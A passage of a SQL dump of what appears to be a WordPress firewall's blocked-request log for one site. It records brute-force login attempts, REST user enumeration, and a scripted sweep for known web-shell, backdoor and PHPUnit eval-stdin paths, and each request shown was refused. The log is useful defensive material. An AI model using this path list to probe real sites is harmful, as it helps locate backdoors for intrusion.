Safari\\/537.36\"}','gyWGpksh8RYjVwe0AML2KDJt',0,1636808561.6012,555,'','POST',403,0,600,0,1,'',0),('169.60.78.94',2839301726,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','14DJQ2KzFlfPqMdmZBAejhRU',0,1636809291.8869,476,'','POST',403,0,600,0,1,'',0),('54.38.181.202',908506570,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','NgSdbxeEI89DqBXkvcwWlHV2',0,1636809892.4075,513,'','POST',403,0,600,0,1,'',0),('95.217.144.72',1608093768,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','T48Vu0cIxAi1KeySqdaZbNpP',0,1636810534.8306,578,'','POST',403,0,600,0,1,'',0),('189.126.106.250',3179178746,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','kxr6AoJIdSHCgWc3DYaBqZGv',0,1636811200.0886,583,'','POST',403,0,600,0,1,'',0),('89.238.223.38',1508826918,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','xeYcKwzbup4sBd1UqomAWHCS',0,1636811788.8300,500,'','POST',403,0,600,0,1,'',0),('190.45.171.165',3190664101,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','NrAH2BESlGIsPeMRimtUT5J3',0,1636812393.3620,663,'','POST',403,0,600,0,1,'',0),('67.227.155.85',1138989909,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','Qz0nRI8TFBHVxoSuh1PcJ6Xl',0,1636813577.4244,533,'','POST',403,0,600,0,1,'',0),('199.116.78.158',3346288286,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','gruk1HjbdARh2OJXwfGzU8Fn',0,1636814194.3040,523,'','POST',403,0,600,0,1,'',0),('192.99.231.139',3227772811,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','1jEsfd4IqebZRDtM9gBATpW3',0,1636814759.7592,1294,'','POST',403,0,600,0,1,'',0),('122.170.98.32',2057986592,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','VhdzW89IM3BTvL4aqRe5KxpA',0,1636815359.2339,490,'','POST',403,0,600,0,1,'',0),('208.109.54.127',3496818303,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','Si1PCqGpsBad0OMNZLcrFnvR',0,1636815929.6101,519,'','POST',403,0,600,0,1,'',0),('34.92.58.160',576469664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','Z49IcBoEXVg7pJT30LmlkDqu',0,1636816481.9455,2518,'','POST',403,0,600,0,1,'',0),('173.236.172.180',2917969076,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','IUWj1aVHscnyl9fPx6btpmCe',0,1636816989.6487,518,'','POST',403,0,600,0,1,'',0),('185.2.4.44',3103917100,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','1rCcNSjoGqkHzDPAWwaTQvIi',0,1636817522.1234,1258,'','POST',403,0,600,0,1,'',0),('173.236.145.137',2917962121,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','djgltPicJGbefTU9O6owEpHK',0,1636818742.6759,556,'','POST',403,0,600,0,1,'',0),('121.43.170.78',2032904782,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','KbSZWu1CmtwOxvLlR5XEGedP',0,1636819380.4873,322,'','POST',403,0,600,0,1,'',0),('202.172.26.53',3400276533,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','J2nv7yMXpdo4lTcbEIjRa93W',0,1636820010.2401,788,'','POST',403,0,600,0,1,'',0),('67.205.12.218',1137511642,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','qkdrojw2nZQ8em3iCtcMVvKf',0,1636820635.2405,1421,'','POST',403,0,600,0,1,'',0),('157.245.110.251',2650107643,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','KZEiJ2YcHfolAugUIFkeOVDL',0,1636821294.2137,546,'','POST',403,0,600,0,1,'',0),('162.144.126.104',2727378536,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','W9CIqwc3xyDtEM1dBTefjulP',0,1636821959.5472,559,'','POST',403,0,600,0,1,'',0),('46.160.121.111',782268783,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','fV5FWvi1lqOHuxUTyPR3eh6L',0,1636823205.9983,1771,'','POST',403,0,600,0,1,'',0),('104.131.167.46',1753458478,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','BbH6CnRTsGquli0Lv9O4DrPW',0,1636823744.5027,581,'','POST',403,0,600,0,1,'',0),('122.170.98.32',2057986592,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','5FWxUXvCiMS0hj2OJK4Ganel',0,1636824282.5006,653,'','POST',403,0,600,0,1,'',0),('31.192.208.12',532729868,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','QkHuzsCxf2YWXOTiyvqla5pc',0,1636824879.4803,620,'','POST',403,0,600,0,1,'',0),('173.236.152.139',2917963915,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','l4wNzeCJ6fqtG0IP1DKWF3mg',0,1636825456.8128,1053,'','POST',403,0,600,0,1,'',0),('207.154.254.58',3483041338,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','5hI2kcUXRivKF6Tseajwbngl',0,1636826011.8914,564,'','POST',403,0,600,0,1,'',0),('52.44.101.206',875324878,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','mTjIoXY7cJxLZUhqpAe6EbnG',0,1636827320.2749,416,'','POST',403,0,600,0,1,'',0),('178.73.217.204',2991184332,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','T41BUzulYI6sKGqd9hPv2grX',0,1636828789.3561,506,'','POST',403,0,600,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','GOHVtiejUsvT5fqMpnJuRdA3',0,1636830921.6340,507,'','GET',403,0,520,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','8hWgH4TP0CA3KJUcz5ivZLEx',0,1636830970.8114,2224,'','GET',403,0,520,0,1,'',0),('74.214.24.238',1255545070,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','1mn2gBrj7KPdylUhD4kx8YTi',0,1636831802.3020,2469,'','POST',403,0,600,0,1,'',0),('81.88.52.106',1364735082,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','1G3SatA4ihPbZg27KMduRBJU',0,1636833227.2350,475,'','POST',403,0,600,0,1,'',0),('107.173.84.179',1806521523,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','a2GbRfMnhQS5DYKIUg0OAc8q',0,1636834688.9167,451,'','POST',403,0,600,0,1,'',0),('167.172.190.95',2813115999,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','ZBjz654TcN3CblMfrdGgUWPY',0,1636836043.5509,473,'','POST',403,0,600,0,1,'',0),('5.189.177.98',96317794,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','kdQpVx7MaG0AJbm3KLDSX5H9',0,1636837418.7743,619,'','POST',403,0,600,0,1,'',0),('45.158.15.145',765333393,'','https://ashbooks.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','eIOUGZp65jCNaxEPo49yViFt',0,1636838636.8169,422,'','GET',403,0,700,0,1,'',0),('45.158.15.146',765333394,'','https://ashbooks.co.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','dIZrbz9mwkH1GgDt8nRc70xX',0,1636838636.8533,395,'','GET',403,0,700,0,1,'',0),('173.236.168.109',2917967981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','FVekAIYwxWyRPXJUZ97bLsqz',0,1636838731.3729,520,'','POST',403,0,600,0,1,'',0),('87.106.124.62',1466596414,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.6.0 CPython\\/2.7.5 Linux\\/3.10.0-1160.45.1.el7.x86_64\"}','MymYZoPlnDatjQs1VIW8pu07',0,1636839693.2467,403,'','GET',403,0,700,0,1,'',0),('93.115.79.153',1567838105,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','N29SELApqzkB0jQwVPfoma3W',0,1636840318.6660,426,'','POST',403,0,600,0,1,'',0),('3.1.209.37',50450725,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','TEM0bo6sePVtdSFwgBGL85Ox',0,1636841942.2163,722,'','POST',403,0,600,0,1,'',0),('187.51.127.28',3140714268,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','syaZFXIGYiVNcTgdhkzQUWto',0,1636843531.5410,442,'','POST',403,0,600,0,1,'',0),('208.113.160.8',3497107464,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','aBI73AzFrjXQZJgcGTiRC9SV',0,1636845121.2223,635,'','POST',403,0,600,0,1,'',0),('195.201.42.236',3284740844,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','jmNC6MQtZH0yUpeJl4DkLWnY',0,1636846578.2238,430,'','POST',403,0,600,0,1,'',0),('67.205.36.137',1137517705,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','NcbW0VQv7FD2k4IRPwpoiE8y',0,1636849499.0410,607,'','POST',403,0,600,0,1,'',0),('161.35.15.239',2703429615,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','3fawlQcFqUzK1gmAdxy947Hs',0,1636851058.6301,868,'','POST',403,0,600,0,1,'',0),('173.255.112.220',2919198940,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','U3gqGEmOTDpjln62FxIeHcYs',0,1636852628.8790,587,'','POST',403,0,600,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.25.0\"}','hQWxKF7GO4S1BvnXdIaCz8mg',0,1636853206.2828,435,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"python-requests\\/2.25.0\"}','71dpGWw9BlH85sZaCizMyjSY',0,1636853207.6323,420,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','FmE6hpjMaIdCBfX8ZDg01Kxy',0,1636853208.9726,424,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','lLgiqrNDYIbcBw76F5RP3vs0',0,1636853210.2968,428,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.25.0\"}','ehfCzs6Oxaw21tpR5ZHKmucT',0,1636853211.7004,426,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.25.0\"}','OxmLy5J1S9lBiqTunW6DsN7r',0,1636853213.0840,396,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.25.0\"}','vpDi9ORGmtQJoMz3rYByFwHZ',0,1636853215.8969,413,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/olux.php','','{\"1\":\"python-requests\\/2.25.0\"}','B6ZDAUrweT1OJEF4CISGH57m',0,1636853217.2754,384,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.25.0\"}','TBgoNhG9brXkEs7Wwyt46FJx',0,1636853218.6486,401,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/up.php','','{\"1\":\"python-requests\\/2.25.0\"}','BIcTWXYCjEqhlisvdt3SFnxD',0,1636853221.3684,411,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.25.0\"}','lAZ9fry5iqBnIkd6sQP47CUO',0,1636853222.6965,437,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"python-requests\\/2.25.0\"}','4kZA7SNwfQuOK5BGdjiWzsXT',0,1636853225.9545,374,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.25.0\"}','CIc3wyVgY7mU5nQEXP2uxibA',0,1636853227.4749,458,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.25.0\"}','mu2E9LvO54atn1qfyizUbx76',0,1636853228.8598,412,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.25.0\"}','5hPlzgcRiDE2NB9vsF4qJdwf',0,1636853230.2028,415,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/upel.php','','{\"1\":\"python-requests\\/2.25.0\"}','ZuwriLt7yMn2OITfCl3kWh1e',0,1636853231.9031,428,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.25.0\"}','GtRYQju4ngKBUmvFCk75Dxad',0,1636853234.0491,442,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/098.php','','{\"1\":\"python-requests\\/2.25.0\"}','kUiDKhbMvf9VzQX6w1pt5CjS',0,1636853235.4258,371,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/V5.php','','{\"1\":\"python-requests\\/2.25.0\"}','z6w2PtByfEWXojNsCrKaT7hD',0,1636853236.7168,424,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.25.0\"}','4AroY0N1s3wxlUyPqaGtuFcp',0,1636853238.0937,395,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.25.0\"}','szHqXCZLGuIcRUE1xgWB8ekn',0,1636853239.3866,377,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.25.0\"}','xdQOGicVquyLl4nBJHo1D78X',0,1636853240.6981,386,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"python-requests\\/2.25.0\"}','TBnuRtJMZDHlboQI9Yqk2z3P',0,1636853241.9991,426,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.25.0\"}','7rN2kIda9W5mnFGO8icwpSoh',0,1636853243.3674,453,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php','','{\"1\":\"python-requests\\/2.25.0\"}','UILSuOHrD1ka4JQNY7K3hFTx',0,1636853244.7484,380,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"python-requests\\/2.25.0\"}','siKNgSOVXlIo2hk09eW6bYd5',0,1636853246.0558,423,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/libraries/joomla/css.php','','{\"1\":\"python-requests\\/2.25.0\"}','ceEUBnTX6Z904jVQ31sdYGIv',0,1636853247.7219,384,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/libraries/joomla/jmails.php?u','','{\"1\":\"python-requests\\/2.25.0\"}','uBMj57GevDgOLzPsfkTYK96w',0,1636853249.0335,375,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/libraries/joomla/jmail.php?u','','{\"1\":\"python-requests\\/2.25.0\"}','LM1HQ78puTWA0fiBlGKteOja',0,1636853250.9036,452,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.25.0\"}','qaTOeJFzCx8ZcA5QD1GpnfEB',0,1636853252.2626,402,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.25.0\"}','PODE6ebnMqNclvY95w2AJdaj',0,1636853255.0324,388,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/XxX.php','','{\"1\":\"python-requests\\/2.25.0\"}','iXCBA9H3jD2PKZfF6d5cGJve',0,1636853256.9955,454,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/Marvins.php','','{\"1\":\"python-requests\\/2.25.0\"}','b2vHfGjx30yYneDLBtrEJadq',0,1636853259.1354,412,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/rxr.php?rxr','','{\"1\":\"python-requests\\/2.25.0\"}','cZ7asuN0HUfpTM1XkCzyYm2n',0,1636853260.4805,397,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/olux.php','','{\"1\":\"python-requests\\/2.25.0\"}','c9MIRfmgQ48xykj3sOBKGAzS',0,1636853261.8284,388,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.25.0\"}','HQ7eo6jMxkRWyTNwnlZVpBOh',0,1636853263.5580,408,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','LKDufobN38CR1MEO4B7PTW9V',0,1636853264.9193,373,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/RxR.php','','{\"1\":\"python-requests\\/2.25.0\"}','jcb7eV3P8izRZHnBtvTmsruS',0,1636853266.4682,417,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"python-requests\\/2.25.0\"}','k7hHCXox8gWGcJaKETArRbIf',0,1636853267.9192,422,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/V3.php','','{\"1\":\"python-requests\\/2.25.0\"}','8F62zKPamnU1i3AklGdSHcts',0,1636853269.3800,422,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/V5.php','','{\"1\":\"python-requests\\/2.25.0\"}','29WLAIZQRDeySv8oHJ0laYVf',0,1636853271.0817,383,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/up.php','','{\"1\":\"python-requests\\/2.25.0\"}','8LQN3RUIDvl4KgOx07TuVMsH',0,1636853273.9951,386,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.25.0\"}','MsSbukC625WJh03P8t1EFT9q',0,1636853275.6795,475,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"python-requests\\/2.25.0\"}','Jfgd4IF3XCcZlG8UPkMLoKbx',0,1636853277.2185,379,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/administrator/templates/bluestork/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','za4h9vI6OCfEZequHLXT2kxU',0,1636853278.5947,400,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/administrator/templates/bluestork/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','2arxRykYNXHl9EKnAP8sTmDV',0,1636853279.9725,381,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/administrator/templates/hathor/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','k3BLJWtjdUZpruxsvNyq5hEA',0,1636853281.6635,447,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/administrator/templates/hathor/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','l2kW819ADa3gN0fVUiXMZCRu',0,1636853283.3257,441,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/administrator/templates/isis/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','2ftZgaj9DdbYmH7nhCPUATsL',0,1636853284.7548,430,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/administrator/templates/isis/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','3YaELAJkRh59jHlpUgsZm12W',0,1636853286.1213,540,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/beez/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','lOHd4w7cENLGz3xs1AFkQKYC',0,1636853287.7127,377,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/ja_purity/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','4lXPga37vOShtYG5KbBUAorx',0,1636853289.0196,387,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','o2UJvL5kqmly3sOijWPSREB6',0,1636853290.3623,394,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/system/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','J4IvjBeyUoWdzwf3GhMc9T5X',0,1636853291.7533,381,'','GET',403,0,700,0,1,'